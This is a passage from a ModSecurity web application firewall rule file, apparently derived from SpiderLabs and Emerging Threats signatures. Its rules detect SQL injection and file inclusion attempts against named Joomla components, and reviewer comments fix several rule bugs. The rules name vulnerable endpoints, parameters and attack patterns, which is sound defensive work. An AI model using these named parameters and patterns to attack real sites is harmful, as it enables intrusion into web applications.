    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005453,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:email "(?i:DELETE.+FROM)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005454) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email ASCII
SecRule REQUEST_LINE "@contains /database/table/user.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005454,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:email "(?i:ASCII\(.+SELECT)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005455) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email UPDATE
SecRule REQUEST_LINE "@contains /database/table/user.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005455,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:email "(?i:UPDATE.+SET)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2008685) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla DS-Syndicate Component feed_id SQL Injection
# NOTE(review): "@contains GET " limits the chain to request lines containing
# "GET ", and "/index2.php?option=ds-syndicate" only matches when `option` is
# the first query parameter. Both look inherited from the source signature;
# confirm whether other methods or parameter orders need coverage.
SecRule REQUEST_LINE "@contains GET " \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008685,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla DS-Syndicate Component feed_id SQL Injection',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6792/'"
    SecRule REQUEST_LINE "@contains /index2.php?option=ds-syndicate" "chain"
    SecRule REQUEST_LINE "@contains version=1" "chain"
    SecRule ARGS:feed_id "(?i:UNION.+SELECT)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla DS-Syndicate Component feed_id SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2008822) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion
# NOTE(review): the final pattern looks for one or more "../" sequences with
# forward slashes only, and the chain is limited to request lines containing
# "GET ". Confirm both limits are intended.
SecRule REQUEST_LINE "@contains /index.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008822,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6980/'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains option=com_pro_desk" "chain"
    SecRule ARGS:include_file "(?i:(\.\.\/){1,})" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

#
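# (2009369) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Simple RSS Reader admin.rssreader.php mosConfig_live_site Parameter Remote File Inclusion
# Review fix: the last rule inspects the *value* of mosConfig_live_site, so
# its pattern must not repeat the parameter name. The previous pattern began
# with the literal "mosConfig_live_site=" and could only match a value that
# itself contained that text. The scheme test is now anchored at the start of
# the value.
# NOTE(review): "@contains GET " limits the chain to request lines containing
# "GET "; confirm whether other request methods need coverage.
SecRule REQUEST_LINE "@contains /admin.rssreader.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009369,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Simple RSS Reader admin.rssreader.php mosConfig_live_site Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7096/'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:mosConfig_live_site "(?i:^\s*(https?|ftps?|php)\:\/)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Simple RSS Reader admin.rssreader.php mosConfig_live_site Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# Review fix for the remaining rules in this group (2009834-2009836, 2009881,
# 2009913, 2009914): ARGS:<name> selects a single request parameter by name.
# The previous selectors embedded a query-string fragment in the name, for
# example ARGS:option=com_artportal&portalid. A normally parsed query string
# or form body does not yield a parameter with such a name, so the chained
# rule had nothing to inspect and the chain could not complete. Each
# name=value pair of the old selector is now its own chained test, which
# makes the match independent of parameter order, and the SQL keyword regex
# runs on the last parameter of the old selector.

# (2009834) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla portalid Component UNION SELECT SQL Injection
SecRule REQUEST_LINE "@contains /index.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009834,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla portalid Component UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36206/info'"
    SecRule ARGS:option "(?i:^com_artportal$)" "chain"
    SecRule ARGS:portalid "(?i:UNION.+SELECT)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla portalid Component UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009835) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla portalid Component SELECT FROM SQL Injection
SecRule REQUEST_LINE "@contains /index.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009835,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla portalid Component SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36206/info'"
    SecRule ARGS:option "(?i:^com_artportal$)" "chain"
    SecRule ARGS:portalid "(?i:SELECT.+FROM)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla portalid Component SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009836) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla portalid Component DELETE FROM SQL Injection
SecRule REQUEST_LINE "@contains /index.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009836,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla portalid Component DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36206/info'"
    SecRule ARGS:option "(?i:^com_artportal$)" "chain"
    SecRule ARGS:portalid "(?i:DELETE.+FROM)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla portalid Component DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009881) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla Com_joomlub Component Union Select SQL Injection
SecRule REQUEST_LINE "@contains /index.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009881,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla Com_joomlub Component Union Select SQL Injection',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9593/'"
    SecRule ARGS:option "(?i:^com_joomlub$)" "chain"
    SecRule ARGS:controller "(?i:^auction$)" "chain"
    SecRule ARGS:view "(?i:^auction$)" "chain"
    SecRule ARGS:task "(?i:^edit$)" "chain"
    SecRule ARGS:aid "(?i:UNION.+SELECT)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla Com_joomlub Component Union Select SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009913) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS joomla com_djcatalog component SELECT FROM SQL Injection
SecRule REQUEST_LINE "@contains /index.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009913,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS joomla com_djcatalog component SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9693/'"
    SecRule ARGS:option "(?i:^com_djcatalog$)" "chain"
    SecRule ARGS:view "(?i:^showItem$)" "chain"
    SecRule ARGS:id "(?i:SELECT.+FROM)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS joomla com_djcatalog component SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009914) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS joomla com_djcatalog component DELETE FROM SQL Injection
SecRule REQUEST_LINE "@contains /index.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009914,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS joomla com_djcatalog component DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9693/'"
    SecRule ARGS:option "(?i:^com_djcatalog$)" "chain"
    SecRule ARGS:view "(?i:^showItem$)" "chain"
    SecRule ARGS:id "(?i:DELETE.+FROM)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS joomla com_djcatalog component DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009915) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS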
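# joomla com_djcatalog component INSERT INTO SQL Injection
#
# Review fixes applied in this group:
#  * 2009915-2009917 and 2009919-2009924: ARGS:<name> selects a single request
#    parameter by name. The previous selectors embedded a query-string
#    fragment in the name (for example ARGS:option=com_djcatalog&view=showItem&id).
#    A normally parsed query string or form body does not yield a parameter
#    with such a name, so the chain could not complete. Each name=value pair
#    of the old selector is now its own chained test and the SQL keyword regex
#    runs on the `id` parameter.
#  * 2009915: the extra REQUEST_LINE "@contains INSER" test was dropped.
#    @contains is case-sensitive while the final regex is case-insensitive,
#    and the other com_djcatalog rules in this group have no such pre-test.
#  * 2009933: the pattern begins with ".php?", which lies before the query
#    string, so it is now evaluated against REQUEST_URI instead of
#    QUERY_STRING.
SecRule REQUEST_LINE "@contains /index.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009915,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS joomla com_djcatalog component INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9693/'"
    SecRule ARGS:option "(?i:^com_djcatalog$)" "chain"
    SecRule ARGS:view "(?i:^showItem$)" "chain"
    SecRule ARGS:id "(?i:INSERT.+INTO)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS joomla com_djcatalog component INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009916) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS joomla com_djcatalog component UNION SELECT SQL Injection
SecRule REQUEST_LINE "@contains /index.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009916,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS joomla com_djcatalog component UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9693/'"
    SecRule ARGS:option "(?i:^com_djcatalog$)" "chain"
    SecRule ARGS:view "(?i:^showItem$)" "chain"
    SecRule ARGS:id "(?i:UNION.+SELECT)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS joomla com_djcatalog component UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009917) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS joomla com_djcatalog component UPDATE SET SQL Injection
SecRule REQUEST_LINE "@contains /index.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009917,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS joomla com_djcatalog component UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9693/'"
    SecRule ARGS:option "(?i:^com_djcatalog$)" "chain"
    SecRule ARGS:view "(?i:^showItem$)" "chain"
    SecRule ARGS:id "(?i:UPDATE.+SET)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS joomla com_djcatalog component UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009919) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component 'id' Parameter SELECT FROM SQL Injection
SecRule REQUEST_LINE "@contains /index.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009919,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36427/info'"
    SecRule ARGS:option "(?i:^com_jlord_rss$)" "chain"
    SecRule ARGS:task "(?i:^feed$)" "chain"
    SecRule ARGS:id "(?i:SELECT.+FROM)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009920) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component 'id' Parameter DELETE FROM SQL Injection
SecRule REQUEST_LINE "@contains /index.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009920,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36427/info'"
    SecRule ARGS:option "(?i:^com_jlord_rss$)" "chain"
    SecRule ARGS:task "(?i:^feed$)" "chain"
    SecRule ARGS:id "(?i:DELETE.+FROM)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009921) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component 'id' Parameter UNION SELECT SQL Injection
SecRule REQUEST_LINE "@contains /index.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009921,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36427/info'"
    SecRule ARGS:option "(?i:^com_jlord_rss$)" "chain"
    SecRule ARGS:task "(?i:^feed$)" "chain"
    SecRule ARGS:id "(?i:UNION.+SELECT)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009924) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component 'id' Parameter INSERT INTO SQL Injection
SecRule REQUEST_LINE "@contains /index.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009924,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36427/info'"
    SecRule ARGS:option "(?i:^com_jlord_rss$)" "chain"
    SecRule ARGS:task "(?i:^feed$)" "chain"
    SecRule ARGS:id "(?i:INSERT.+INTO)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009922) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component 'id' Parameter UPDATE SET SQL Injection
SecRule REQUEST_LINE "@contains /index.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009922,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36427/info'"
    SecRule ARGS:option "(?i:^com_jlord_rss$)" "chain"
    SecRule ARGS:task "(?i:^feed$)" "chain"
    SecRule ARGS:id "(?i:UPDATE.+SET)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009929) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion Attempt
# NOTE(review): this chain fires on the presence of a parameter whose name
# contains "target" (the pattern is unanchored) together with two literal
# request-line fragments. It never inspects the parameter's value, so a
# request without any path traversal still scores as critical. "Itemid=128&"
# is a fixed literal, presumably taken from the published report; verify
# against the deployment and consider testing the value of `target` instead.
SecRule ARGS_NAMES "(?i:target)" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009929,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9706/'"
    SecRule REQUEST_LINE "@contains /index.php?option=com_album&" "chain"
    SecRule REQUEST_LINE "@contains Itemid=128&" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009933) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Mambo/Joomla! com_koesubmit Component 'koesubmit.php' Remote File Inclusion Attempt
# The pattern expects ".php?" followed within 300 characters by "=" and a
# remote scheme. QUERY_STRING starts after the "?", so the script's own
# ".php?" was never part of the inspected text; REQUEST_URI carries both the
# path and the query string.
# NOTE(review): REQUEST_BODY is kept as before; a form body would need to
# contain ".php?" itself to match. Confirm whether body coverage is wanted.
SecRule REQUEST_LINE "@contains /com_koesubmit/koesubmit.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009933,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Mambo/Joomla! com_koesubmit Component \'koesubmit.php\' Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.owasp.org/index.php/PHP_File_Inclusion'"
    SecRule REQUEST_URI|REQUEST_BODY "(?i:\x2Ephp\x3F.{0,300}\x3D(http\x3A|ftp\x3A|https\x3A|ftps\x3A))" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Mambo/Joomla! com_koesubmit Component \'koesubmit.php\' Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009934) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion
# NOTE(review): the chain is limited to request lines containing "GET " and
# the final test looks for "../" with forward slashes only; confirm both
# limits are intended.
SecRule REQUEST_LINE "@contains /components/com_moofaq/includes/file_includer.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009934,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/8898/'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:file "@contains ../" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# NOTE(review) for the Survey Manager rules below: the literal tests
# "/index.php?option=com_surveymanager" and "task=editsurvey&" only match when
# `option` is the first query parameter and `task` is followed by another
# parameter, so the same request with its parameters in a different order is
# not covered. Consider separate ARGS:option and ARGS:task tests.

# (2009938) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component SELECT FROM SQL Injection
SecRule REQUEST_LINE "@contains /index.php?option=com_surveymanager" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009938,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36464/info'"
    SecRule REQUEST_LINE "@contains task=editsurvey&" "chain"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009939) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component DELETE FROM SQL Injection
SecRule REQUEST_LINE "@contains /index.php?option=com_surveymanager" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009939,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36464/info'"
    SecRule REQUEST_LINE "@contains task=editsurvey&" "chain"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009940) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UNION SELECT SQL Injection
SecRule REQUEST_LINE "@contains /index.php?option=com_surveymanager" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009940,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36464/info'"
    SecRule REQUEST_LINE "@contains task=editsurvey&" "chain"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION.+SELECT)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009941) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component INSERT INTO SQL Injection
SecRule REQUEST_LINE "@contains /index.php?option=com_surveymanager" \
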